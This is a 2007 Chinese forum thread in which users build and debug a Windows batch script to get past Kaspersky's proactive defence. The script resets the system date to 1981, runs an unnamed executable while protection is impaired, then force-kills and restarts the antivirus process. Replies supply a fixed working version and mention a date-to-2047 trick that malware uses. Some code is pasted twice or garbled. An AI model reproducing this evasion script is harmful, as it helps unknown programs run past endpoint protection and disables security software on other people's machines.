标题: 绕过卡巴主动防御的批处理【新方法遇到疑问】 [打印本页]
作者: heicai 时间: 2007-6-29 12:32 标题: 绕过卡巴主动防御的批处理【新方法遇到疑问】
网上有个饶过卡巴主动防御的批处理,但是每次恢复日期后卡巴不能一下子快速反映回来,会没响应一分钟左右。
我想到用结束进程再恢复的方法来让它快速反映。
但是写批处理遇上个莫名其妙的问题。
先帖上代码
@echo off
tasklist|findstr /i "avp.exe" && (
set date=%date%
date 1981-01-01
ping -n 12 localhost > nul
haha.exe
date %date%
taskkill /f /t /im avp.exe
for /f "skip=4 tokens=3-7" %%i in ('reg QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AVP /v ImagePath
') do (
set avpp=%%i %%j %%k %%l %%m
goto restart
)
:restart
call %avpp%
goto exit
)
:exit
echo 结束
pause
tasklist|findstr /i "avp.exe" && (
set date=%date%
date 1981-01-01
ping -n 12 localhost > nul
haha.exe
date %date%
taskkill /f /t /im avp.exe
for /f "skip=4 tokens=3-7" %%i in ('reg QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AVP /v ImagePath
') do (
set avpp=%%i %%j %%k %%l %%m
goto restart
)
:restart
call %avpp%
goto exit
)
:exit
echo 结束
pause
问题是启动卡巴后无法执行后面的exit标号后的代码。
我郁闷的要死
请高人指点!!!!
[ Last edited by heicai on 2007-6-29 at 12:59 PM ]
作者: dikex 时间: 2007-6-29 13:01
卡巴有驱动保护,taskkill命令是无法访问或者结束它的进程的,除非你的是绿色版之类的东西
作者: heicai 时间: 2007-6-29 13:02
| Quote: | |
|
把时间改成1981年,再改回来。
这时卡巴就完全瘫痪了。用taskkill命令可以杀死进程!
作者: HAT 时间: 2007-6-29 13:36
把call改成start
作者: heicai 时间: 2007-6-29 13:39
| Quote: | |
|
乱说,这样连卡巴都启动不起来了。
作者: dikex 时间: 2007-6-29 13:47
注意用语
call调用后需要等待被调用的命令结束才会执行下一个命令的;
改为start可以,但如果路径有空格,直接改会出问题了;
start "" "路径" 参数
作者: heicai 时间: 2007-6-29 13:53
%avpp%的环境变量内的路径是这样的"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
麻烦楼上的告诉我start %avpp%具体该怎么写
[ Last edited by heicai on 2007-6-29 at 01:55 PM ]
作者: HAT 时间: 2007-6-29 14:41
//乱说,这样连卡巴都启动不起来了。
要低调 要低调 ^_^
start命令是可以滴
作者: HAT 时间: 2007-6-29 14:47
try this one :)
@echo off
set app=C:\test 1\my test\aa.bat
start "" "%app%"
aa.batset app=C:\test 1\my test\aa.bat
start "" "%app%"
@echo off
echo 我的目录有这么多空格,还是可以被start执行嘿嘿
pause
echo 我的目录有这么多空格,还是可以被start执行嘿嘿
pause
| Quote: | |
|
作者: gorke 时间: 2007-6-30 21:37
@echo off
tasklist|findstr /i "avp.exe" && (
set date=%date%
date 1981-01-01
ping -n 12 localhost > nul
haha.exe
date %date%
taskkill /f /t /im avp.exe
for /f "skip=4 tokens=3-7" %%i in ('reg QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AVP /v ImagePath
') do (
set avpp=%%i %%j %%k %%l %%m
goto restart
)
:restart
start "" %avpp%
goto exit
)
:exit
echo 结束
pause
换成这个就可以了~!
作者: wewe12 时间: 2007-6-30 22:40
还是不行啊,说什么没找到framedyn.dll,因此这个程序未能启动
作者: koala 时间: 2007-8-23 15:50
你就知道 卡巴 没有考虑过你改时间的问题啊
省点时间抱抱猫,转转 论坛学习吧
作者: icyheart 时间: 2007-8-23 19:07
上次在网上见了一种病毒把时间一下改成2047年,卡巴斯基一下子就过期不能用啦这时它的自我保护功能就失效 啦,这时可以K掉它
作者: scriptor 时间: 2007-8-24 03:20
| Quote: | |
|
来个全盘搜索
for %%a in (c d e f) do (
for /f %%b in ('dir /s %%a:\avp.exe') do set avp-%%a=%%~fb
)
然后调用avp-%%afor /f %%b in ('dir /s %%a:\avp.exe') do set avp-%%a=%%~fb
)
这个简单
我就不写了
[ Last edited by scriptor on 2007-8-24 at 03:23 AM ]
作者: nforce1 时间: 2007-8-24 14:21
汗一个..研究这个.不会是想做病毒吧??
不过.也学习啦.呵呵
改系统时间真的可以把卡巴K掉啊?
要试验下了
作者: zwgxsy 时间: 2007-10-30 18:52
卡巴的bug 改时间就没用了
作者: putao 时间: 2007-10-30 23:35
很不错